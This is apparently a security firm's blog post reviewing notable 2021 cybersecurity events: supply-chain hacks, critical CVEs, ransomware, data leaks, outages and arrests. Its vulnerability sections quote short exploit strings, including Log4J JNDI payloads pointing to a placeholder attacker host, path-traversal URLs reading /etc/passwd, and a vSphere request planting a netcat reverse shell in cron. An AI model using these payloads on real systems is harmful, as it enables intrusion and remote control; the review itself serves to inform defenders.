The Arbitrary Top of the Year 2021

Published on

As this is a "top", the goal is not to detail each subject, for that, I refer you to the OSSIR news reviews in PDF and video (https://www.ossir.org/support-des-presentations/?date=2021)

2020

Let's get to the heart of the matter, the year 2020 was quite catastrophic with major data leaks, large scale vendor compromises, major vulnerabilities...

I ended the year with this meme accompanying my test greetings:

The main question then is "what was the year 2021?"

A hint, I had started the year with this edit πŸ˜‚ :

2021, another year of vendor compromise?

So-called "supply chain" attacks are old, but they have become increasingly common in recent years.

Remember the hacks of :

  • Juniper in 2015, with the addition of a generic password to authenticate instead of any user, which caused the stock price to plummet;
  • CCleaner in 2017, with the addition of a malware in a specific version of the tool, installed automatically if automatic updates were activated;
  • The Ukrainian editor MEDoc in 2017, with the famous NotPetya attack destroying the information systems of Saint-Gobain, Maersk...
  • The editor NetSarang in 2017 (server management tool), with the addition of a backdoor named ShadowPad ;
  • ASUS in 2019, with malicious, yet signed, updates on ASUS laptops ;
  • ...

2021 confirmed this trend with more and more hacks.

In 2021, we had the aftermath of the Solarwinds hack, which led to the compromise of thousands of U.S. agencies, Microsoft, FireEye ... :

  • Confirmation of Qualys, MalwareBytes, Mime and Palo Alto Networks compromises (2021-02-09 review)
  • Confirmation of NASA and FAA compromises (2021-03-09 review)
  • "It's not our fault, it's the intern!" (2021-03-09 review)

In 2021, we had the hacks of:

  • Stormshield with the leak of the source codes of the SNS and SNI firewalls, as well as the ANSSI putting under observation the qualifications and approvals of the said products (review of 2021-02-09)
  • More than 30 000 American administrations with the ProxyLogon vulnerability, affecting Microsoft Exchange, that we will see just after (review of 2021-03-09)
  • Many companies using Centreon, a network monitoring tool (reviewed on 2021-03-09)
  • Codecov, code analysis tool, used by more than 9,000 open source projects (review of 2021-05-13)

In 2021, as in previous years, we had the deployments of rogue libraries:

  • "pm run for your lives" with the release of packages spoofing the names of packages used internally at Apple, Amazon, Yelp, Microsoft, Slack... (review of 2021-03-09)
  • More and more malicious libraries at PyPi (reviewed on 2021-12-12)
  • Again and again backdoor libraries at npm, with this time the hacking of the maintainer's account (review of 2021-11-09)

2021, again a year of major vulnerabilities? #VulnsMajeures

The situation seems to be getting worse and worse and this is partly true, for three main reasons:

  1. There are more and more vulnerabilities because more and more people, tools, companies... are looking for them. So statistically, there are more critical vulnerabilities;
  2. The widely used software are few (they are often the same) and everything (or almost everything) being connected to the Internet, a critical vulnerability on one of these software impacts hundreds of thousands or even millions of companies, local authorities, government agencies, individuals...
  3. Finally, we are all talking about it much more than before, with a wider scope, making these vulnerabilities more visible.

2021 confirmed this trend with more major vulnerabilities having major impacts.

Moreover, this year concluded with Log4J which is definitely characteristic of 2021.

In 2021, we had the real fix for ZeroLogon, a vulnerability that allows to instantly become an administrator of a Microsoft Active Directory domain (review of 2021-02-09):

CVE-2020-1472; massively exploited in the wild; CVSS=10.0/10 (as a reminder, the CVSS score allows to calculate the technical criticality of a vulnerability from 0 to 10, a score higher than 9 being the end of the world 😊)

In 2021, we had Microsoft Exchange, the email management software, back in fashion (for attackers) and packed with major vulnerabilities:

  • ProxyLogon, remote control without authentication (reviewed on 2021-03-09):
CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065; massively exploited in the wild; CVSS=10.0/10 
Found by Orange Tsai 
Corrected to the wild by the FBI at U.S. companies (reviewed on 2021-05-13)
  • Full recovery of a mailbox without authentication (reviewed on 2021-04-13): CVE-2021-26855; ; CVSS=9.1/10
  • ProxyOracle, old-fashioned "oracle padding" (reviewed on 2021-03-09):
CVE-2021-31196, CVE-2021-31195 ; ; CVSS=7.2/10
Found by Orange Tsai
Deserves its place in #VulnsOfThe90s
  • 4 remote takeovers without authentication (2021-09-14 review):
CVE-2021-28480, CVE-2021-28481, CVE-2021-28482, CVE-2021-28483; ; CVSS=9.8/10
One of which was reported by the NSA
  • ProxyShell, remote takeover without authentication (reviewed on 2021-09-14):
CVE-2021-34473, CVE-2021-34523, CVE-2021-31207; massively exploited in the wild; CVSS=10.0/10
Submitted to Pwn2Own

In 2021, Microsoft Azure CosmoDB (with Jupyter Notebook) experienced the leak of CosmoDB keys from all Notebooks, allowing data to be stolen from all databases of all customers (reviewed on 2021-09-14).

In 2021, virtualization solutions leader VMWare suffered major vulnerabilities in its flagship products, sometimes exposed live on the Internet πŸ€¦β€β™‚οΈ :

  • vSphere, remote control takeover without authentication (reviewed on 2021-03-09): CVE-2021- 21972 and CVE-2021-21973; exploited massively in the wild; CVSS=9.8/10
  • vSphere, remote control without authentication (reviewed on 2021-10-12): CVE-2021-22005; exploited massively in the wild; CVSS=9.8/10
  • vCenter, the hypervisor management software, vulnerable to remote takeover without authentication (reviewed on 2021-10-12) : CVE-2021-21972; massively exploited in the wild; CVSS=9.8/10

In 2021, the Palo Alto Networks vendor also suffered from a remote takeover without authentication (2021-12-12 review):

CVE-2021-3064; exploited in the wild; CVSS=9.8/10
Would also deserve its place in #VulnsCyberSec
Vulnerability causing a triple "bad buzz":
   β–Ή Vulnerability discovered by US pentesting company Randori, who kept it under wraps for 1 year! Which is unethical
   β–Ή Palo Alto who discreetly modified their security bulletin to make it look like they had fixed the vulnerability 1 year before
   Palo Alto which... does not pay researchers who report vulnerabilities to them

In 2021, Bloomberg published an article about the 3 hacks of Juniper (router and firewall editor) that led to the addition of backdoors by (review of 2021-09-14) :

  • The Americans in 2008
  • The Chinese in 2012
  • Again the Chinese in 2014 And since then? Good question πŸ˜‰.

In 2021, Gitlab CE, the source code management and software factory software (CI/CD pipeline) was vulnerable to a remote takeover without authentication (2021-11-09 review):

CVE-2021-22205; exploited in the wild; CVSS=10.0/10
From a vulnerability in the "ExifTool" image processing tool (CVE-2021-22204).

Let's take a quick look at what you use the most and for which hundreds of vulnerabilities have been fixed in 2021:

  • Browsers (all reviews πŸ˜‰ ): Chrome: 309 including 48 high or critical Firefox: 121 of which 52 are high or critical Microsoft Edge: 26 (including 2 critical) Microsoft Edge Chromium: many (including at least 50 high or critical)
  • Smartphones (all reviews πŸ˜‰ ): Android: 574 including 151 high or critical iOS: 336 including 234 high or critical

iOS, we will talk about it again in the legal part, with the "NSO Group" case.

And finally, you were all waiting for it, because it spoiled our Christmas vacations: Log4J πŸ₯³πŸŽ‰ logging library, with a remote takeover without authentication (2021-12-12 review):

  • A story starting with Minecraft players hacking other players;
  • A story affecting the whole planet;
  • A never-ending story with a sequence of patches and new vulnerability discoveries:
Version 2.14, CVE-2021-44228; massively exploited in the wild; CVSS=10.0/10 (example exploit: ${jndi:ldap://hacker.com:389/a})
Version 2.15, CVE-2021-45046; exploited in the wild; CVSS=9.0/10 (exploit example: ${jndi:ldap://127.0.0.1#hacker.com:389/a} )
Version 2.16, CVE-2021-45105; exploited in the wild; CVSS=5.9/10 (example exploit: {${::-${::-$.${::-j}}}} )
Version 2.17, CVE-2021-44832 ; ; CVSS=6.6/10 (if the attacker can modify the configuration file and add a JNDI path in the JDBCAppender, so unlikely πŸ˜‰ )
  • A story in which we have to thank SwitHak for making available a follow-up of all impacted editors, followed by the Dutch CERT (NCSC-NL)

2021, a confirmation that security products are full of vulnerabilities? #VulnsCyberSec

From what I remember, it was around 2014-2015 that people started to realize that cybersecurity products were software like any other: stuffed with vulnerabilities.

I remember in particular the work of Tavis Ormandi who found critical vulnerabilities in the most famous antivirus products.

2021 was a continuation of the previous years. In 2021, we could see vulnerabilities on security solutions from the editor Fortinet :

  • FortiWeb, application firewall or WAF, with remote takeovers without authentication (2021-02-09 review):

β—‹ CVE-2020-29016 and CVE-2020-29019 (Buffer overflow), CVE-2020-29015 (SQL Injection) ...; exploited in the wild; CVSS=9.8/10

  • FortiWan, with a remote takeover without authentication (reviewed on 2021-05-13):

β—‹ CVE-2021-26102; exploited in the wild; CVSS=9.8/10 In 2021, again Palo Alto Network firewalls had a remote takeover without authentication on the Telnet service (reviewed on 2021-03-09): β—‹ CVE-2020-10188; ; CVSS=8.1/10

In 2021, IBM Qradar log analysis (SIEM) software suffered a remote control takeover without authentication (2021-02-09 review):

β—‹ CVE-2020-4888; ; CVSS=8.8/10 In 2021, Sonicwall VPN remote access solutions were vulnerable to remote takeover without authentication (2021-05-13 review): β—‹ CVE-2021-20021, CVE-2021-20022, CVE-2021-20023; exploited massively in the wild; CVSS=7.2/10 but the 3 accumulated we are more like 10.0/10 CVE-2021-20034 (admin password reset without authentication); exploited in the wild; CVSS=9.1/10 In 2021, as in previous years, Pulse Secure remote access solutions were vulnerable to a remote takeover without authentication (2021-05-13 review):

CVE-2021-22893; massively exploited in the wild; CVSS=10.0/10 β—‹ Exploited since summer 2020 but fixed in May 2021 😱 And all the others:

  • F5, with dozens of vulnerabilities allowing remote control without authentication (reviewed 2021-04-13)
  • Cisco, with hundreds of vulnerabilities resulting in remote takeover without authentication (all reviews πŸ˜‰ )

2021, a confirmation that today's vulnerabilities strongly resemble those of the 90s? #VulnsOfThe90s

<<The 90s just called, they want their vulnerabilities back...>>

When we see some of the vulnerabilities of 2021, their technical aspect, the triviality with which they can be exploited, we are tempted to draw a parallel with the beginnings of the Internet in the 90's-2000's and the almost total absence of security. Microsoft seems to be a specialist in the discipline:

  • PrintNightmare, the summer 2021 soap opera with a flurry of incomplete patches and print spooler vulnerabilities (2021-09-14 review):

β—‹ CVE-2021-1675, CVE-2021-34527, CVE-2021-36936, CVE-2021-36958; exploited massively in the wild; CVSS=8.8/10

  • SigRed, the notorious remote takeover without authentication of Windows DNS servers via a simple SIG-like DNS query (reviewed on 2021-03-09):

β—‹ CVE-2020-1350; massively exploited in the wild; CVSS=10.0/10

  • SeriousSAM or HiveNightmare, Microsoft's incredible mistake regarding rights to the Windows password SAM database (2021-09-14 review):

β—‹ CVE-2021-36934; exploited in the wild; CVSS=7.8/10

  • PetitPotam or EfsPotato, allowing to get an AD domain account without authentication, pure joy for slackers and cybercriminals (reviewed on 2021-09-14):

β—‹ CVE-2021-36942; exploited in the wild; CVSS=7.5/10

  • Local (and trivial) elevation of privileges through the installation of the Razer mouse driver (reviewed on 2021-11-09)
  • Corruption of the Windows file system (NTFS partition), just by trying to access C::$i30:$bitmap (reviewed on 2021-02-09)
  • Denial of service (DoS) on Windows by a simple IPv6 routable packet on the Internet (reviewed on 2021-03-09) :

β—‹ CVE-2021-24806; exploited in the wild; CVSS=7.5/10 Microsoft Azure also had its 90s vulnerability with OMIGOD, the tool deployed on all Azure Cloud instances without customers' knowledge and allowing remote takeover without authentication (2021-10-12 review): β—‹ CVE-2021-38647; exploited in the wild; CVSS=9.8/10 The Unicode Left-To-Right Override character and its friends (LRE, RLE, LRO, RLO), have made a comeback, to hide backdoors in source code (2021-09-14 review) The vulnerabilities of the 90s are also "path traversal", i.e. triggering by just sending "/../../" :

  • Grafana (2021-12-12 review):

β—‹ CVE-2021-43798; ; CVSS=7.5/10 β—‹ With a simple: "http://cible:3000/public/plugins/loki/../../../../../../../../etc/passwd"

  • VMWare vSphere, already seen above (2021-10-12 review):

β—‹ CVE-2021-22005; massively exploited in the wild; CVSS=9.8/10

β—‹ With a simple: "https://cible/analytics/telemetry/ph/api/hyper/send?_c=&_i=/../../../../../../etc/cron.d/$RANDOM -H Content-Type: -d "* * * * * root nc -e /bin/sh IP-SHELLBACK 4444"

  • Atlassian Jira Server (2021-10-12 review):

β—‹ CVE-2021-26086; exploited in the wild; CVSS=5.3/10 β—‹ With a simple "http://cible/s/cfx/_/;/WEB-INF/web.xml" or "http://cible/s/cfx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties"

  • Apache HTTPD , with the remote takeover without authentication whose first patch was bypassed (2021-10-12 review):

β—‹ CVE-2021-41773 then CVE-2021-42013; massively exploited in the wild; CVSS=7.5/10 β—‹ With a simple http://cible/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/passwd β—‹ Whose first patch was bypassed by "http://cible/cgi-bin/..;/..;/..;/..;/..;/etc/passwd" or "http://cible/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd"

And I'm not going to talk about SOHO routers, those network boxes for small companies or individuals, doing WiFi, internet access... full of trivial vulnerabilities (review of 2021-03-09).

2021, again the year of ransomware, in the continuity of 2018, 2019 and 2020?

This business model of cybercriminals does not seem to slow down (all reviews πŸ˜‰ ) with some outstanding or out of the ordinary facts.

Revil group started targeting insurers for new targets (2021-04-13 review) The Babuk Group has compromised the Washington D.C. Police Department and threatened to release information about their informants (2021-05-13 review). The DarkSide Group (an affiliate) hacked and held the U.S. Colonial Pipeline to ransom (2021-05-13 review). The Conti Group hacked a British diamond dealer and apologized for it (at the request of the Kremlin) after releasing the data, some of which was linked to Mohammed Bin Salman (2021-11-09 review).

2021, an innovation with the hacking of cybersecurity experts?

What could be better than hacking a cybersecurity researcher and stealing his work including his unpublished vulnerabilities. This is not really a novelty but in 2021, there have been several cases of this type.

An espionage campaign (led by North Korea) targeted cybersecurity researchers with fake researcher profiles, fake blogs and booby-trapped Visual Studio project mailings (2021-02-09 review). The company Bastion Secure (actually the FIN7 group) published fake job offers, to manipulate researchers into carrying out ransomware attacks (2021-11-09 review).

2021, the year of massive data leaks again?

Every year has its data leaks and 2021 is no exception with a large number of data leaks or privacy breaches.

There was the Dedalus affair, with the theft and publication of medical data concerning 491,840 French people, including 300,000 Bretons (review of 2021-03-09) As every year, Facebook has been involved in problems concerning personal data:

  • Theft and publication of 533 million accounts (reviewed on 2021-04-13)
  • Whistleblower exposed for abuse and lies (2021-10-12 review) After the leak of password digests in 2012, in 2021 Linkedin suffered a massive data download (scrapping) and publication, involving 700 million users (forgotten review πŸ˜₯) A list of 86,939 Fortinet VPN logins and passwords was published (reviewed on 2021-09-14) Twitch was hacked and ALL of their tools 🀯 along with a lot of data were released (reviewed on 2021-10-12) After the chaotic release of the game Cyberpunk 2077, CD Projekt was hacked with the theft of source codes and blackmail (review of 2021-03-09)

Gravatar was hacked with the leakage of 124 million users' data (2021-12-12 review) Finally in 2021, Wired published an article about Amazon and the lack of respect for its customers' data (review of 2021-12-12)

2021, again the year of widespread outages?

A bit like for major vulnerabilities, some outages have a very large impact and every year, different web actors manage to surprise us with the creativity of their outages, especially for GAFAM/MAGMA, for which this happens regularly.

Fastly CDN had a "short" outage with many cascading impacts (2021-09-14) Facebook went down due to a BGP problem (2021-10-12 review)

  • Still the fault of BGP "Bridging Gap Protocol" πŸ€¦β€β™‚οΈπŸ€¦β€β™‚οΈπŸ€¦β€β™‚οΈ according to skynews Microsoft Azure suffered a mega outage (in October but forgotten from the review πŸ˜₯) AWS went down again, multiple times (reviewed on 2021-12-12) OVH suffered a fire in the SBG2 datacenter in Strasbourg due to a UPS (reviewed on 2021-04-13) Google deleted all HackerNews content, including backups (2021-11-09 review) During the transition to 2022, Microsoft Exchange had trouble transitioning to the new year and all instances crashed (2022-01-11 review)

2021, marked by numerous arrests of cybercriminals?

Fortunately, our law enforcement agencies are not idle and regularly arrest cybercriminals.

This year 2021 was particularly rich in arrests. Egregor operators arrested (review of 2021-03-09) The technical brain of the group FIN7, was sentenced to 10 years in prison (review of 2021-05-13) 7 members of Revil/GanCrab arrested (reviewed on 2021-11-09) Europol carried out some nice operations:

  • Arrest of the main members of Emotet, filmed and it looked like a parody of cybercriminals (review of 2021-02-09)
  • Arrest of 12 cybercriminals linked to LockerGoga, MegaCortex and Dharma ransomware deployments (2021-11-09 review)
  • Operation "HAECHI-II" with the arrest of 1,000 people linked to president scams (2021-12-12 review) Gendarmerie and Europol arrested more than 150 cybercriminals in Operation "Dark HunTOR" (reviewed on 2021-11-09) Many criminals and cybercriminals, users of Sky ECC (secure smartphones) have been arrested (review of 2021-12-12)

2021, an innovation in security conferences?

Several cybersecurity-related conferences or events stood out in 2021.

These cybersecurity conferences or events or media include:

  • The Netmask and the Pen 😍😍😍(2021-09-14 review)
  • Unlock Your Brain πŸ‘, in November, in Brest
  • Barbhack, in august, in Toulon (review of 2021-09-14)
  • The Pwned blog at substack (review of 2021-10-12)
  • Tianfucup 2021, the Chinese Pwn2Own (review of 2021-11-09)
  • Pwn2Own Austin 2021, Special printers, routers, smartphones..., with a nice first place for Synacktiv (review of 2021-11-09)

2021, particularly marked by business?

Each year sees its share of buyouts, fundraisings, low blows and the creation of interest groups.

2021 was again a particularly rich year in these areas. Tenable bought Alsid for $98m (2021-03-09 review) Datadog bought Sqreen with Bercy studying the file closely (2021-03-09 review) ThreatQuotient raised $22m (reviewed on 2021-04-13) Glimps raised €6m (reviewed on 2021-04-13) The list of GAIA-X members (the European Cloud), has been published but composed of very (too) many non-European editors (reviewed on 2021-04-13) CrowdSec has raised 5m€ (reviewed on 2021-05-13) FireEye was sold for $1.2 billion (2021-09-14 review) Vade Secure has been fined $14m by the US (2021-09-14 review)

  • And maybe another $29m (reviewed on 2021-11-09) F5 acquired Threat Stack for $68m (reviewed on 2021-10-12) Dell and VMWare split (reviewed on 2021-11-09)

2021, rich in publications of reference systems and guides?

The publications are essential to help improve the level of all and for some, become the repositories of the field.

The ANSSI has published, among others:

  • A repository for remote identity verification (2021-03-09 review)
  • Cybersecurity for VSEs/SMEs in 12 questions
  • A "Zero Trust" model (reviewed on 2021-05-13)
  • Completely rewrites its authentication guide 🀩 (2021-10-12 review) The NSA, too, has released its recommendations for implementing Zero Trust, starting with not trusting them 🀣 (reviewed on 2021-03-09) Strong authentication has become mandatory for banks since May 15, 2021, for amounts over €30 (reviewed on 2021-03-09)

This year has been particularly marked by legal events.

The cyber risk has been ranked among the main ones according to the "Davos Forum" (review of 2021-02-09) As a result of changes in Whatsapp's terms of use, people have massively migrated to Signal (reviewed on 2021-02-09)

  • With the increase in the value of Signal's stock... Advance Inc , totally unrelated to Signal
  • And Signal was flooded with messages trying to get users' emails, to offer sexting, camgirls and porn Github has updated its policy, banning exploits, offensive tools... (reviewed on 2021-05-13) Doxxing has been made illegal The Chinese government has announced to preempt vulnerabilities found by its citizens (reviewed on 2021-10-12) We'll end with NSO Group and its Pegasus malware.

The Israeli company (long known and linked to the Khashoggi affair) and its malware have been at the heart of one of the biggest espionage cases in recent years with :

  • The release of a list of 50,000 victims provided to journalists and containing politicians, a number of Emmanuel Macron, journalists, employees of the U.S. State Department, political opponents, activists in the Sultanate of Bahrain... (review of 2021-03-09)
  • The discovery by the general public of the so-called "Zero Click" attacks allowing to hack any smartphone up to date with the latest security patches (reviewed on 2021-09-14)
  • The intervention of Amnesty International and CitizenLab to analyze the malware and the vulnerabilities used (reviewed on 2021-09-14)
  • NSO's blacklisting by the US Department of Commerce (reviewed on 2021-11-09)
  • The lawsuit filed by Whatsapp, from which NSO could not escape (reviewed on 2021-11-09)
  • Apple's complaint to ban them from using Apple tools, devices... (reviewed on 2021-12-12)
  • The resignation of the CEO (reviewed on 2021-12-12)

.".."..".."..".."..".."..".."..".."._

Finally, what seems to me to characterize this year the most is the very large number of vulnerabilities:

  1. With a very high criticality ;
  2. Resembling vulnerabilities from the 90's-2000's;
  3. Massively exploited very quickly after the announcement of their existence;
  4. Often affecting open source components included in proprietary software used everywhere;
  5. With multiple incomplete patches or very long correction times. I'm rambling when I say this but what saved many companies were simply good practices such as strict compartmentalization. For this new year 2022, I wish you all the best, health and I hope to see you very soon in front of a good beer 🍻. Happy new year to all.

Blog: Fortigate CVE-2023-27997 (XORtigate) in the eyes of the owl

The arbitrary Top of the past year 2022

KeePass, ultra-mega-giga critical vulnerability πŸ€¦β€β™‚οΈ

Let's keep in touch

Subscribe to our newsletter